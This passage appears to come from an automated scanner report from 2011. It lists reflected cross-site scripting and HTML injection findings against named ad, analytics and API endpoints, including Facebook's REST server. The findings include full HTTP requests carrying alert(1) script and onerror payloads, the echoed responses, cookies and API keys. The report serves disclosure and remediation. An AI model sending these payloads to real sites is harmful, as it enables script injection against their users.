GET /ad/js/13966-88527-2151-6?mpt=2157694&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/u%3B234423007%3B0-0%3B1%3B3619820%3B10408-336/850%3B40033784/40051571/1%3B%3B%7Eokv%3D%3Bad%3Dss%3Bad%3Dbb%3Bad%3Dhp%3Bsz%3D160x600%2C300x250%2C336x850%3Bpos%3Dad6%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Djs%3Bfromrss%3Dn%3Brss%3Dn%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f712dc'%3balert(1)//23d3264674b HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Set-Cookie: mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; expires=Wed, 13-Feb-2013 5:55:16 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 455
Date: Mon, 14 Feb 2011 01:37:42 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/u;234423007;0-0;1;3619820;10408-336/850;40033784/40051571/1;;~okv=;ad=ss;ad=bb;ad=hp;sz=160x600,300x250,336x850;pos=ad6;poe=yes;orbit=y;del=js;fromrss=n;rss=n;~aopt=6/0/ff/0;~sscs=?712dc';alert(1)//23d3264674bhttp://altfarm.mediaplex.com/ad/ck/13966-88527-2151-6?mpt=2157694">
...[SNIP]...

3.94. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-6

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4bde'%3balert(1)//6d86e68f733 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4bde';alert(1)//6d86e68f733 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13966-88527-2151-6?mpt=2157694&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/u%3B234423007%3B0-0%3B1%3B3619820%3B10408-336/850%3B40033784/40051571/1%3B%3B%7Eokv%3D%3Bad%3Dss%3Bad%3Dbb%3Bad%3Dhp%3Bsz%3D160x600%2C300x250%2C336x850%3Bpos%3Dad6%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Djs%3Bfromrss%3Dn%3Brss%3Dn%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f&f4bde'%3balert(1)//6d86e68f733=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Set-Cookie: mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; expires=Wed, 13-Feb-2013 5:55:16 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 458
Date: Mon, 14 Feb 2011 01:37:45 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/u;234423007;0-0;1;3619820;10408-336/850;40033784/40051571/1;;~okv=;ad=ss;ad=bb;ad=hp;sz=160x600,300x250,336x850;pos=ad6;poe=yes;orbit=y;del=js;fromrss=n;rss=n;~aopt=6/0/ff/0;~sscs=?&f4bde';alert(1)//6d86e68f733=1http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-6?mpt=2157694">
...[SNIP]...

3.95. http://api.bizographics.com/v1/profile.json [&callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload b93bd<script>alert(1)</script>a6d294015c8 was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoDatab93bd<script>alert(1)</script>a6d294015c8&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXTjLwm8dPXkaj5XcunNcMDa7Re6IGD4lLFy3bMisHmNbAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRCZ1UAhIHgQp0s9VPhT38SEVUJBxdqAyDQmBis3kUIRCUjpBQhSgJ05dWzEQqSCDqAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Mon, 14 Feb 2011 01:36:39 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7Kb8iiqRrrqiiplaj5XcunNcMDa7Re6IGD4lBFocpwBNElwAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtSkshqfjmnjnFGDBYisbP9XVEVUJBxdqAyA0iimflEzxWuEyFjlqKSSPxZXQiiFVMClmMipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 219
Connection: keep-alive

dj.module.ad.bio.loadBizoDatab93bd<script>alert(1)</script>a6d294015c8({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

3.96. http://api.bizographics.com/v1/profile.json [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 36839<script>alert(1)</script>f9aaf154604 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun36839<script>alert(1)</script>f9aaf154604 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXTjLwm8dPXkaj5XcunNcMDa7Re6IGD4lLFy3bMisHmNbAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRCZ1UAhIHgQp0s9VPhT38SEVUJBxdqAyDQmBis3kUIRCUjpBQhSgJ05dWzEQqSCDqAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 14 Feb 2011 01:36:41 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvun36839<script>alert(1)</script>f9aaf154604)

3.97. http://api.dimestore.com/viapi [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 60c4a<a>9e2f8f9272e was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /viapi?action=pixel&id=64105156860c4a<a>9e2f8f9272e HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: respondentId=ec3090ffba90412a8149082ce035a177; respondentEmail=""; IgUsFjsrORc3NyILDBo6HychGw%3D%3D=EyADRWJEY0NpdVl%2BSWFG; Mlo9CTINKhomHCQJNys5Fzc3Igs%3D=dkd8VQ%3D%3D; Mlo9CTINKhomHCQJNysrEzEh=EwwpRRURLVJ1dkl%2FVWJFb0Nyfl1%2BX2BGbzUIEEJ9UGBEb1oMKg0kBHMnOxMrIAg%2FAXMgJh8gbQ%3D%3D%0A; IBogOiIBKgExLQYjCzIdPRcaNwEiEj0rfkJ2c1E%3D=dQ%3D%3D; pixel_681051260=1; pixel_7668dede487ec485)(sn=*=1; pixel_a11059176=1

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Mon, 14 Feb 2011 01:37:25 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: pixel_64105156860c4a<a>9e2f8f9272e=1; Expires=Tue, 14-Feb-2012 01:37:25 GMT
Content-Length: 55

// DIMESTORE PIXEL OK -- 64105156860c4a<a>9e2f8f9272e

3.98. http://api.echoenabled.com/v1/search [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.echoenabled.com
Path:   /v1/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload befc2<a>168ce8e9d57 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/search?callback=jsonp1297694123476&q=childrenof%3Ahttp%3A%2F%2Fwww.aboutecho.com%2Fe2%2Ftweets%2Fe2launch+user.id%3Awww.twitter.com%2Fchrissaad%2Cwww.twitter.com%2Fcailloux2007%2Cwww.twitter.com%2Fwadcom%2Cwww.twitter.com%2Flevwalkin%2Cwww.twitter.com%2Fechoenabled%2Cwww.twitter.com%2Fechostatus%2Cwww.twitter.com%2Fkhrisloux+tags%3Aecho+-state%3ASystemFlagged%2CModeratorDeleted+children+-state%3ASystemFlagged%2CModeratorDeleted+sortOrder%3AreverseChronological+itemsPerPage%3A4+sanitizeHTML%3Afalse+befc2<a>168ce8e9d57&appkey=prod.echocorp HTTP/1.1
Host: api.echoenabled.com
Proxy-Connection: keep-alive
Referer: http://aboutecho.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Mon, 14 Feb 2011 14:34:44 GMT
Content-Length: 139
Content-Type: application/x-javascript; charset="utf-8"

jsonp1297694123476({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"befc2<a>168ce8e9d57\" at 424" });

3.99. http://api.facebook.com/restserver.php [method parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 51f5d<img%20src%3da%20onerror%3dalert(1)>50bd65752c8 was submitted in the method parameter. This input was echoed as 51f5d<img src=a onerror=alert(1)>50bd65752c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats51f5d<img%20src%3da%20onerror%3dalert(1)>50bd65752c8&urls=%5B%22http%3A%2F%2Fwww.legacy.com%2Flegacies%2F2011%2Fobituary-photo-gallery.aspx%3Fphoto%3Dbetty-garrette96f0%2522style%253d%2522x%253aexpression(alert(1))%2522520eb12a7af%26pid%3D148615818%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Mon, 14 Feb 2011 01:29:50 GMT
Content-Length: 466

fb_sharepro_render({"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats51f5d<img src=a onerror=alert(1)>50bd65752c8"},{"key":"urls","value":"[\"http:\/\/www.legacy.com\/legacies\/2011\/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818\"]"},{"key":
...[SNIP]...

3.100. http://api.facebook.com/restserver.php [method parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 1ca06<img%20src%3da%20onerror%3dalert(1)>7fc4ebab431e57952 was submitted in the method parameter. This input was echoed as 1ca06<img src=a onerror=alert(1)>7fc4ebab431e57952 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.

Request

GET /restserver.php?method=fql.query&query=SELECT%20name%2Cpic_small%2Cuid%20from%20user%20WHERE%20uid%20IN%20(1292387673)&method=fql.query1ca06<img%20src%3da%20onerror%3dalert(1)>7fc4ebab431e57952&api_key=54cc5dbde0acea15cbf544d4e434acc0&format=JSON&call_id=599&v=1.0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/json
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Mon, 14 Feb 2011 01:38:38 GMT
Content-Length: 388

{"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"method","value":"fql.query1ca06<img src=a onerror=alert(1)>7fc4ebab431e57952"},{"key":"query","value":"SELECT name,pic_small,uid from user WHERE uid IN (1292387673)"},{"key":"api_key","value":"54cc5dbde0acea15cbf544d4e434acc0"},{"key":"format","value":"JSON"},{"key":"call_id",
...[SNIP]...

3.101. http://api.facebook.com/restserver.php [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload d807b<img%20src%3da%20onerror%3dalert(1)>86106d539e46377d1 was submitted in the query parameter. This input was echoed as d807b<img src=a onerror=alert(1)>86106d539e46377d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.

Request

GET /restserver.php?method=fql.query&query=SELECT%20name%2Cpic_small%2Cuid%20from%20user%20WHERE%20uid%20IN%20(1292387673)d807b<img%20src%3da%20onerror%3dalert(1)>86106d539e46377d1&method=fql.query&api_key=54cc5dbde0acea15cbf544d4e434acc0&format=JSON&call_id=599&v=1.0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: application/json
Expires: Sun, 13 Feb 2011 17:39:13 -0800
Pragma:
X-Cnection: close
Date: Mon, 14 Feb 2011 01:38:13 GMT
Content-Length: 424

{"error_code":601,"error_msg":"Parser error: unexpected 'd807b' at position 61.","request_args":[{"key":"method","value":"fql.query"},{"key":"query","value":"SELECT name,pic_small,uid from user WHERE uid IN (1292387673)d807b<img src=a onerror=alert(1)>86106d539e46377d1"},{"key":"api_key","value":"54cc5dbde0acea15cbf544d4e434acc0"},{"key":"format","value":"JSON"},{"key":"call_id","value":"599"},{"key":"v","value":"1.0"}]}

3.102. http://api.facebook.com/restserver.php [urls parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload ec7bd<img%20src%3da%20onerror%3dalert(1)>a0b94148a55 was submitted in the urls parameter. This input was echoed as ec7bd<img src=a onerror=alert(1)>a0b94148a55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.legacy.com%2Flegacies%2F2011%2Fobituary-photo-gallery.aspx%3Fphoto%3Dbetty-garrette96f0%2522style%253d%2522x%253aexpression(alert(1))%2522520eb12a7af%26pid%3D148615818%22%5Dec7bd<img%20src%3da%20onerror%3dalert(1)>a0b94148a55&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sun, 13 Feb 2011 17:32:01 -0800
Pragma:
X-Cnection: close
Date: Mon, 14 Feb 2011 01:30:01 GMT
Content-Length: 482

fb_sharepro_render({"error_code":114,"error_msg":"param urls must be an array.","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats"},{"key":"urls","value":"[\"http:\/\/www.legacy.com\/legacies\/2011\/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818\"]ec7bd<img src=a onerror=alert(1)>a0b94148a55"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});

3.103. http://api.js-kit.com/v1/count [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.js-kit.com
Path:   /v1/count

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload d0e85<a>179ca1bd15e was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/count?q=d0e85<a>179ca1bd15e&callback=Reuters.utils.socialCallback&appkey=prod.reuters.com HTTP/1.1
Host: api.js-kit.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Mon, 14 Feb 2011 01:36:03 GMT
Content-Length: 148
Content-Type: application/x-javascript; charset="utf-8"

Reuters.utils.socialCallback({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"d0e85<a>179ca1bd15e\" at 19" });

3.104. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 56ff7<script>alert(1)</script>c505676b722 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction56ff7<script>alert(1)</script>c505676b722&n=ar_int_p85001580&1297650567782 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
